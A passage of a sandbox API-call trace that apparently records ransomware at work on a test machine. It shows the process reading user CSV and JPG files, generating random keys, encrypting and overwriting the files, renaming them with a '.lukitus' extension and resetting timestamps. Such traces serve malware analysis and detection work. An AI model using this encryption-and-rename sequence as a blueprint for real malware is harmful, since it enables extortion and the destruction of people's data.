lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeca11d0, ftCreationTime.dwHighDateTime=0x1d303c7, ftLastAccessTime.dwLowDateTime=0x63bc0dd0, ftLastAccessTime.dwHighDateTime=0x1d30087, ftLastWriteTime.dwLowDateTime=0x63bc0dd0, ftLastWriteTime.dwHighDateTime=0x1d30087, nFileSizeHigh=0x0, nFileSizeLow=0x384e)) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.411] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\8KgurcPGpDs5t.csv" (normalized: "c:\\users\\aetadzjz\\desktop\\8kgurcpgpds5t.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.412] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\8KgurcPGpDs5t.csv" (normalized: "c:\\users\\aetadzjz\\desktop\\8kgurcpgpds5t.csv"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-29A7DC8C-DFC0E8056306.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-29a7dc8c-dfc0e8056306.lukitus"), dwFlags=0x9) returned 1 [0107.414] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.414] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.419] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x384e, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x384e, lpOverlapped=0x0) returned 1 [0107.419] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.419] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x384e, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x384e, lpOverlapped=0x0) returned 1 [0107.420] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.420] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x640ded90, dwHighDateTime=0x1d31760)) [0107.420] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.420] FlushFileBuffers (hFile=0x328) returned 1 [0107.423] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\Af6epVD_ptV-.csv" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\af6epvd_ptv-.csv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29bee50, ftCreationTime.dwHighDateTime=0x1d30620, ftLastAccessTime.dwLowDateTime=0xc9c27a50, ftLastAccessTime.dwHighDateTime=0x1d2fc73, ftLastWriteTime.dwLowDateTime=0xc9c27a50, ftLastWriteTime.dwHighDateTime=0x1d2fc73, nFileSizeHigh=0x0, nFileSizeLow=0xb601)) returned 1 [0107.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.424] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\Af6epVD_ptV-.csv" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\af6epvd_ptv-.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.424] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\Af6epVD_ptV-.csv" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\af6epvd_ptv-.csv"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-44CE3CD7-AFD504F36697.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-44ce3cd7-afd504f36697.lukitus"), dwFlags=0x9) returned 1 [0107.426] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.426] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.430] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xb601, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xb601, lpOverlapped=0x0) returned 1 [0107.431] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.431] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xb601, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xb601, lpOverlapped=0x0) returned 1 [0107.431] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.432] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x640ded90, dwHighDateTime=0x1d31760)) [0107.432] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.432] FlushFileBuffers (hFile=0x328) returned 1 [0107.435] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\uzQVRf8Ab6Zlxci59iY5.csv" (normalized: "c:\\users\\aetadzjz\\documents\\uzqvrf8ab6zlxci59iy5.csv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc03b57f0, ftCreationTime.dwHighDateTime=0x1d2fe02, ftLastAccessTime.dwLowDateTime=0xcb5275e0, ftLastAccessTime.dwHighDateTime=0x1d303d6, ftLastWriteTime.dwLowDateTime=0xcb5275e0, ftLastWriteTime.dwHighDateTime=0x1d303d6, nFileSizeHigh=0x0, nFileSizeLow=0x124c6)) returned 1 [0107.435] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.435] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.435] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.435] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.435] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.435] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.435] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.435] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.436] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.436] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.436] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.436] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.436] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.436] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.436] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.436] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.436] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.436] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.436] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.436] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.436] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.436] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\uzQVRf8Ab6Zlxci59iY5.csv" (normalized: "c:\\users\\aetadzjz\\documents\\uzqvrf8ab6zlxci59iy5.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.436] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\uzQVRf8Ab6Zlxci59iY5.csv" (normalized: "c:\\users\\aetadzjz\\documents\\uzqvrf8ab6zlxci59iy5.csv"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-1BCB39FD-C93E3B4C590B.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-1bcb39fd-c93e3b4c590b.lukitus"), dwFlags=0x9) returned 1 [0107.438] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.438] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.443] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x124c6, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x124c6, lpOverlapped=0x0) returned 1 [0107.443] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.443] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x124c6, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x124c6, lpOverlapped=0x0) returned 1 [0107.444] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.444] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64104ef0, dwHighDateTime=0x1d31760)) [0107.444] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.444] FlushFileBuffers (hFile=0x328) returned 1 [0107.447] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\qFSpDSqJ5ckg.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\qfspdsqj5ckg.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe45db2e0, ftCreationTime.dwHighDateTime=0x1d2fdcb, ftLastAccessTime.dwLowDateTime=0x206d1c30, ftLastAccessTime.dwHighDateTime=0x1d30515, ftLastWriteTime.dwLowDateTime=0x206d1c30, ftLastWriteTime.dwHighDateTime=0x1d30515, nFileSizeHigh=0x0, nFileSizeLow=0x55bf)) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.448] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\qFSpDSqJ5ckg.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\qfspdsqj5ckg.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.448] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\qFSpDSqJ5ckg.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\qfspdsqj5ckg.jpg"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\F56924BE-9663-41BB-8EC36E5C-CA39E2CA23E1.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\f56924be-9663-41bb-8ec36e5c-ca39e2ca23e1.lukitus"), dwFlags=0x9) returned 1 [0107.450] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.450] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.455] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x55bf, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x55bf, lpOverlapped=0x0) returned 1 [0107.455] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.455] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x55bf, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x55bf, lpOverlapped=0x0) returned 1 [0107.456] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.456] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6412b050, dwHighDateTime=0x1d31760)) [0107.456] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.456] FlushFileBuffers (hFile=0x328) returned 1 [0107.459] GetFileAttributesExW (in: lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875)) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, 